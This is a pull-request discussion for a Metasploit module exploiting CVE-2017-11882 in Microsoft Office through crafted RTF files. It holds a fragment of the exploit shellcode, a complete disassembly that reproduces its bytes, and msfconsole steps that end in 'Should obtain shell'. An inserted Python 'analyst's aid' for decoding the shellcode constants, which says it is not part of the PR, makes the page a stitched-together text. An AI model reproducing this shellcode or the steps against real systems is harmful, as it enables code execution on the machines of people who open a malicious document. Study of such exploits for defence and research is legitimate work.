CVE-2017-11882 Microsoft Office Memory Corruption #9226
Conversation
I'm wondering why it should be a .rtf file?
@islamTaha12 OLE
def generate_rtf
Could this be extracted into something like lib/msf/core/exploit/rtf.rb and take a parameter payload or uri?
This would make malicious rtf file generation reusable and possibly allow for a utility to expand and offer "injection" into existing rtf files.
Yeah, I believe this would be easily possible. Should I put this into that directory, with that name and PR it, with a "command" parameter? @jmartin-r7
If that's what you're implying, unless I'm misunderstanding :D
@realoriginal, I would suggest just refactoring this code in a new commit added here, and extracting this method into a utility similar to the other files in the lib/msf/core/exploit path.
Is this still required, since I've now just put an injection style into the module? @jmartin-r7 all good if so
Not required from my view, just a preferred item. The injection style you used is specific to how this module functions, with the payload being something of a web delivery. We can open an issue separately to request a refactor into a utility for rtf, or maybe really in this case OLE. Since @wwebb-r7 has assigned this PR, I will defer to him.
header << "000000000000000000000000000000000000000000000000000000000000000\n"
shellcode = "\x1c\x00\x00\x00\x02\x00\x9e\xc4\xa9\x00\x00\x00\x00\x00\x00\x00"
We'll need some documentation or provenance on the shellcode. Either one large block comment or traditional side comments of each instruction. If you reused someone else's and they happen to have that, you can link it and we may be able to push this through and do it afterwards.
No problem, I did use someone else's, and ... I'll go find it :)
Disassembly of the shellcode
0: 1c 00 sbb al,0x0
2: 00 00 add BYTE PTR [eax],al
4: 02 00 add al,BYTE PTR [eax]
6: 9e sahf
7: c4 a9 00 00 00 00 les ebp,FWORD PTR [ecx+0x0]
d: 00 00 add BYTE PTR [eax],al
f: 00 c8 add al,cl
11: a7 cmps DWORD PTR ds:[esi],DWORD PTR es:[edi]
12: 5c pop esp
13: 00 c4 add ah,al
15: ee out dx,al
16: 5b pop ebx
17: 00 00 add BYTE PTR [eax],al
19: 00 00 add BYTE PTR [eax],al
1b: 00 03 add BYTE PTR [ebx],al
1d: 01 01 add DWORD PTR [ecx],eax
1f: 03 0a add ecx,DWORD PTR [edx]
21: 0a 01 or al,BYTE PTR [ecx]
23: 08 5a 5a or BYTE PTR [edx+0x5a],bl
26: b8 44 eb 71 12 mov eax,0x1271eb44
2b: ba 78 56 34 12 mov edx,0x12345678
30: 31 d0 xor eax,edx
32: 8b 08 mov ecx,DWORD PTR [eax]
34: 8b 09 mov ecx,DWORD PTR [ecx]
36: 8b 09 mov ecx,DWORD PTR [ecx]
38: 66 83 c1 3c add cx,0x3c
3c: 31 db xor ebx,ebx
3e: 53 push ebx
3f: 51 push ecx
40: be 64 3e 72 12 mov esi,0x12723e64
45: 31 d6 xor esi,edx
47: ff 16 call DWORD PTR [esi]
49: 53 push ebx
4a: 66 83 ee 4c sub si,0x4c
4e: ff 10 call DWORD PTR [eax]
50: 90 nop
51: 90 nop
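The three immediates in the disassembly above are XOR-encoded against 0x12345678 (mov, then xor with edx, then a 16-bit sub on si). As an added analyst's aid, and not code from the module or from anyone in this PR, the script below replays exactly that mov/xor/sub sequence from the posted listing to recover the underlying 32-bit values. What those values refer to inside the target process is not stated on the page and is not assumed here.

```python
import re

# Constructed input: the instructions from the objdump-style disassembly
# posted in this PR thread that build the constants (copied from the comment).
DISASM = """\
26: b8 44 eb 71 12 mov eax,0x1271eb44
2b: ba 78 56 34 12 mov edx,0x12345678
30: 31 d0 xor eax,edx
40: be 64 3e 72 12 mov esi,0x12723e64
45: 31 d6 xor esi,edx
4a: 66 83 ee 4c sub si,0x4c
"""

# "offset: bytes... mnemonic dst,src" (two-operand forms only)
INSN = re.compile(r"^\s*([0-9a-f]+):(?:\s+[0-9a-f]{2})+\s+(\w+)\s+(\w+),(\w+)\s*$")

def parent(reg: str) -> str:
    """Map a 16-bit register name (si) to its 32-bit parent (esi)."""
    return reg if reg.startswith("e") else "e" + reg

def contains_null(value: int) -> bool:
    """True if the 4-byte little-endian encoding of value has a 0x00 byte."""
    return 0 in value.to_bytes(4, "little")

def decode_constants(disasm: str):
    """Emulate only the mov/xor/sub register arithmetic to recover the real
    32-bit values behind the XOR-encoded immediates.
    Returns (final registers, trace of (offset, register, value) per insn).
    Any other instruction raises so a different shellcode is not mis-decoded.
    """
    regs: dict[str, int] = {}
    trace: list[tuple[int, str, int]] = []
    for line in disasm.splitlines():
        m = INSN.match(line)
        if not m:
            continue
        off, op, dst, src = m.groups()
        reg = parent(dst)
        val = int(src, 16) if src.startswith("0x") else regs[parent(src)]
        if op == "mov":
            regs[reg] = val & 0xFFFFFFFF
        elif op == "xor":
            regs[reg] ^= val
        elif op == "sub" and not dst.startswith("e"):
            # 16-bit sub (sub si,0x4c): only the low word of esi changes.
            regs[reg] = (regs[reg] & 0xFFFF0000) | ((regs[reg] - val) & 0xFFFF)
        else:
            raise ValueError(f"unhandled instruction: {line.strip()}")
        trace.append((int(off, 16), reg, regs[reg]))
    return regs, trace
```

Each decoded value contains a 0x00 byte that its encoded immediate lacks, which contains_null makes easy to check per step of the trace.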
I'll put it next to it
Some other information (PDF): https://29wspy.ru/reversing/CVE-2017-11882.pdf
Nice, thanks. If you don't get around to adding them to the module by tomorrow night, I may do it myself and send you a PR so we can try to get this merged.
All good. I should have some time tomorrow morning to do it.
Done! :D. Thought I might also try one last thing, to see if I can inject existing RTFs.
Nevermind, figured it out, just had to put return header afterwards.
I had a comment typed out, but let me look over your new commit first.
Edit: @realoriginal alright, I was going to suggest an alternate route to get both the rtf injection and the module done separately, but seeing how you're making good progress on it, carry on.
:D. Sounds good. Yeah after this is done, I was gonna try and look at putting
A couple of minor things regarding documentation
I'd avoid making relative time references. I'd wager that most would eventually figure it out, but this is potentially confusing to someone looking at this in 2028.
Same thing here, along with some other grammatical errors and the mention of a separate PoC. The description in the info hash should stick to the formula
or something along those lines. I'm not going to let those hold up merging though. I'll correct them myself later unless you really want to.
Ahh I see. Fixing now.
Updated with the appropriate syntax.
Well that was quick, thanks. If I see anything else I'll take care of it.
haha, thought I'd take a break from the Metasploitable CTF and check on the PRs haha. Thank you sir!
Release Notes
This update adds an exploit for CVE-2017-11882, a memory corruption vulnerability when parsing OLE objects in Microsoft Office.
PR adds the recent CVE-2017-11882 vulnerability which allows code execution as the user opening the document. Different than the PoC from Embedi, allows more space.
Verification
List the steps needed to make sure this thing works
msfconsole
use exploit/windows/fileformat/office_ms17_11882
set PAYLOAD [PAYLOAD]
set FILENAME /path/to/file.rtf
run
Should obtain shell.
Tested
Tested on MS Office 2010 SP 2 Windows 7